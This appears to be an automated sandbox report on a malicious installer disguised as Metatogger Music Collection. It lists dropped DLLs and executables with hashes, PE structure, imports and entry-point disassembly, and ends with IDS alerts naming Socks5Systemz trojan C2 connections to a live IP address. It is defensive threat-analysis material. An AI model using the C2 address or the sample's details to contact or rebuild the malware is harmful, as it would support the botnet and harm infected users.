                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):40974
                                                                          Entropy (8bit):6.485702128133584
                                                                          Encrypted:false
                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):176200
                                                                          Entropy (8bit):6.647007817777345
                                                                          Encrypted:false
                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):68552
                                                                          Entropy (8bit):6.1042544770100395
                                                                          Encrypted:false
                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:modified
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097039022655032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:MR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          SHA1:418C982C63DA06773421F92266BADA86761701EB
                                                                          SHA-256:B7DFAAFB460D5AB8F2F0CE0FA5F12833EAAF20AAE9A9919A5EB83743EAF4FE1A
                                                                          SHA-512:9DAC3574E65E2F172620FBAA591E464C1331479480F2F5A25ABE6FFE52A9A8544222D219E84E8C72F4334B2D18053B62DA76C8EFAE2A3F5A45CC95D9311EED8B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.dat

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:InnoSetup Log Metatogger Music Collection, version 0x30, 4833 bytes, 648351\user, "C:\Users\user\AppData\Local\Metatogger Music Collection"
                                                                          Category:dropped
                                                                          Size (bytes):4833
                                                                          Entropy (8bit):4.734964346980098
                                                                          Encrypted:false
                                                                          SSDEEP:96:F6dWw389HpVl42jz9k+eOIh+s4cVSQs0Ln0eosN:kdWw3kHpVPrHIhQcVSQ1n0/w
                                                                          MD5:68939F1ADEACEF1F38CDA33036CE41F6
                                                                          SHA1:58FA7896203CFD5F93A810E804024A15B7C57CFF
                                                                          SHA-256:5CB5EAAD4F0FF6066CC290499E080C7F3D7E0C570CB4475A496A71D7C3785C50
                                                                          SHA-512:E362D1B4CC6FCFA3E735C7525BAAD038B1F897F8978C963F8014B2BFC97DC4A0E900AA703E51665E953F772B2EEEFC0E8D9DFC97B721CFBD55AB2A4EC8EBA761
                                                                          Malicious:false
                                                                          Preview:Inno Setup Uninstall Log (b)....................................Metatogger Music Collection.....................................................................................................Metatogger Music Collection.....................................................................................................0...........%.................................................................................................................7...........G.......Z....648351.user9C:\Users\user\AppData\Local\Metatogger Music Collection.............1.... .....Z......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...

                                                                          C:\Users\user\AppData\Local\Metatogger Music Collection\unins000.exe (copy)

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):704282
                                                                          Entropy (8bit):6.476114986803567
                                                                          Encrypted:false
                                                                          SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExydK:o/qrQ0yVrPg37AzHqA6Zfn093NWXExyM
                                                                          MD5:4F22DFEEA2A871E85C620A3A85A06D36
                                                                          SHA1:47CBC1D887AEF7F4F1F3460967FBA4180DDA154E
                                                                          SHA-256:2D529D076A78BEC4EC6C0DAF805BD19087E01E1D9CC8E1F1107B8CCEB8D12E4F
                                                                          SHA-512:5F80087EF9A1C064AF5EAE5AC0D3BEFA75650874D2952054B040F31C6C161BD3324D084108EF1F6DEA00CFBFD55FB449A78DBDB2CE6CA150ED392C44AF20CC29
                                                                          Malicious:true
                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):693760
                                                                          Entropy (8bit):6.467807457190382
                                                                          Encrypted:false
                                                                          SSDEEP:12288:lhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpO9+u1nWXExyd:A/qrQ0yVrPg37AzHqA6Zfn093NWXExyd
                                                                          MD5:8E02BC0DF97F95A1DF3FD1EEE341C73F
                                                                          SHA1:725A46C1380C1D56BCFDF2E1E69EFBABA192A1CB
                                                                          SHA-256:52823D5894E5BD513EAE0EFAC44079187A078A37D023017D37670D1381B4566D
                                                                          SHA-512:522CB11FFDC238F2FEBBCA868D52887B2C3B957EE51448488B3949F7AD7707103891FD5C80B0105FFFDEBFB7B666FADD58AFA6E0060D789DC5B1E6C652A73449
                                                                          Malicious:true
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4096
                                                                          Entropy (8bit):4.026670007889822
                                                                          Encrypted:false
                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2560
                                                                          Entropy (8bit):2.8818118453929262
                                                                          Encrypted:false
                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):4.058068250306624
                                                                          Encrypted:false
                                                                          SSDEEP:192:46MTeid8XO+N2RPnqkHM2rrRbwz6ln+rnbdaBlJBRJBBti94muL+Xh2IwoXAsLi2:ST6O+NwqAM+k6lnWnboZDXyRPtAsLiA
                                                                          MD5:B6F11A0AB7715F570F45900A1FE84732
                                                                          SHA1:77B1201E535445AF5EA94C1B03C0A1C34D67A77B
                                                                          SHA-256:E47DD306A9854599F02BC1B07CA6DFBD5220F8A1352FAA9616D1A327DE0BBF67
                                                                          SHA-512:78A757E67D21EB7CC95954DF15E3EEFF56113D6B40FB73F0C5F53304265CC52C79125D6F1B3655B64F9A411711B5B70F746080D708D7C222F4E65BAD64B1B771
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.X.5.6.5.6.5.6.5.7.7.6.W.%.6.6...<.=.6...8.4.6...2.4.6.Rich5.6.........................PE..L....g.E...........!.....@...0.......E.......P.......................................................................P.......P..(............................p.......................................................P...............................text..._5.......@.................. ..`.rdata.......P.......P..............@..@.data...@....`.......`..............@....reloc.......p.......p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):6144
                                                                          Entropy (8bit):4.215994423157539
                                                                          Encrypted:false
                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dll

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):23312
                                                                          Entropy (8bit):4.596242908851566
                                                                          Encrypted:false
                                                                          SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                          MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                          SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                          SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                          SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.994207338297064
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:file.exe
                                                                          File size:2'049'145 bytes
                                                                          MD5:f306ea1faa91611b7bc26e9cc0bd3956
                                                                          SHA1:accc3aa32f33273b46765d024c0cb16cc8463486
                                                                          SHA256:ff66d8e75eccb014fd09adc9045bd1630219def9a7635d4a9ac382466eb7f435
                                                                          SHA512:da7398c9b8022b66a038e5c42c90b8ddafdb0b0d1a9a2c466582f4f13b02a90d4e51033cfeba5410ba5def247232192541e7eaafa01102e59370f3ee4c6d1608
                                                                          SSDEEP:49152:32e2wVd44xMOR2voxA14iCOeIVjwpEoC+M3NEPTWmxbX+X3g4gtStO:meLV6rOWgAOirtjYEow3ePSWL+Hg4kwO
                                                                          TLSH:AA9533435A8544BAF121BDF7BAB06A08B4AB6E333279B108390F0CC92D3FA7555DC785
                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                          File Icon

                                                                          Icon Hash:2d2e3797b32b2b99

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x409b24
                                                                          Entrypoint Section:CODE
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:1
                                                                          OS Version Minor:0
                                                                          File Version Major:1
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:1
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          add esp, FFFFFFC4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor eax, eax
                                                                          mov dword ptr [ebp-10h], eax
                                                                          mov dword ptr [ebp-24h], eax
                                                                          call 00007F4EA0E23B37h
                                                                          call 00007F4EA0E24D3Eh
                                                                          call 00007F4EA0E26F69h
                                                                          call 00007F4EA0E26FB0h
                                                                          call 00007F4EA0E298A3h
                                                                          call 00007F4EA0E29A0Ah
                                                                          xor eax, eax
                                                                          push ebp
                                                                          push 0040A1DBh
                                                                          push dword ptr fs:[eax]
                                                                          mov dword ptr fs:[eax], esp
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A1A4h
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          mov eax, dword ptr [0040C014h]
                                                                          call 00007F4EA0E2A430h
                                                                          call 00007F4EA0E29F97h
                                                                          lea edx, dword ptr [ebp-10h]
                                                                          xor eax, eax
                                                                          call 00007F4EA0E27599h
                                                                          mov edx, dword ptr [ebp-10h]
                                                                          mov eax, 0040CDE4h
                                                                          call 00007F4EA0E23BE8h
                                                                          push 00000002h
                                                                          push 00000000h
                                                                          push 00000001h
                                                                          mov ecx, dword ptr [0040CDE4h]
                                                                          mov dl, 01h
                                                                          mov eax, 004072ECh
                                                                          call 00007F4EA0E27E28h
                                                                          mov dword ptr [0040CDE8h], eax
                                                                          xor edx, edx
                                                                          push ebp
                                                                          push 0040A15Ch
                                                                          push dword ptr fs:[edx]
                                                                          mov dword ptr fs:[edx], esp
                                                                          call 00007F4EA0E2A4A0h
                                                                          mov dword ptr [0040CDF0h], eax
                                                                          mov eax, dword ptr [0040CDF0h]
                                                                          cmp dword ptr [eax+0Ch], 01h
                                                                          jne 00007F4EA0E2A5DAh
                                                                          mov eax, dword ptr [0040CDF0h]
                                                                          mov edx, 00000028h
                                                                          call 00007F4EA0E28229h
                                                                          mov edx, dword ptr [0040CDF0h]
                                                                          cmp eax, dword ptr [edx+00h]

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          CODE0x10000x92440x940000d95da090f9b045cc52199c7b36d118False0.6099820523648649data6.529731839731562IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          DATA0xb0000x24c0x40039d5f89b5ecafeb0fe902996045df0e7False0.3076171875data2.734702734719094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          BSS0xc0000xe480x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                          .reloc0x100000x8b40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x110000x2c000x2c003838d4184c8472ffbcdb08caec92e21cFalse0.32359730113636365data4.465277888232694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                          RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                          RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                          RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                          RT_STRING0x125740x2f2data0.35543766578249336
                                                                          RT_STRING0x128680x30cdata0.3871794871794872
                                                                          RT_STRING0x12b740x2cedata0.42618384401114207
                                                                          RT_STRING0x12e440x68data0.75
                                                                          RT_STRING0x12eac0xb4data0.6277777777777778
                                                                          RT_STRING0x12f600xaedata0.5344827586206896
                                                                          RT_RCDATA0x130100x2cdata1.2045454545454546
                                                                          RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                          RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States0.2814569536423841
                                                                          RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                                                          Imports

                                                                          DLLImport
                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                          user32.dllMessageBoxA
                                                                          oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                          comctl32.dllInitCommonControls
                                                                          advapi32.dllAdjustTokenPrivileges

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          DutchNetherlands
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          03/29/24-12:09:45.420994TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14971280192.168.2.545.142.214.240
                                                                          03/29/24-12:10:33.201024TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977380192.168.2.545.142.214.240
                                                                          03/29/24-12:10:31.266790TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14977080192.168.2.545.142.214.240
                                                                          03/29/24-12:09:50.438859TCP2049467ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M14971880192.168.2.545.142.214.240
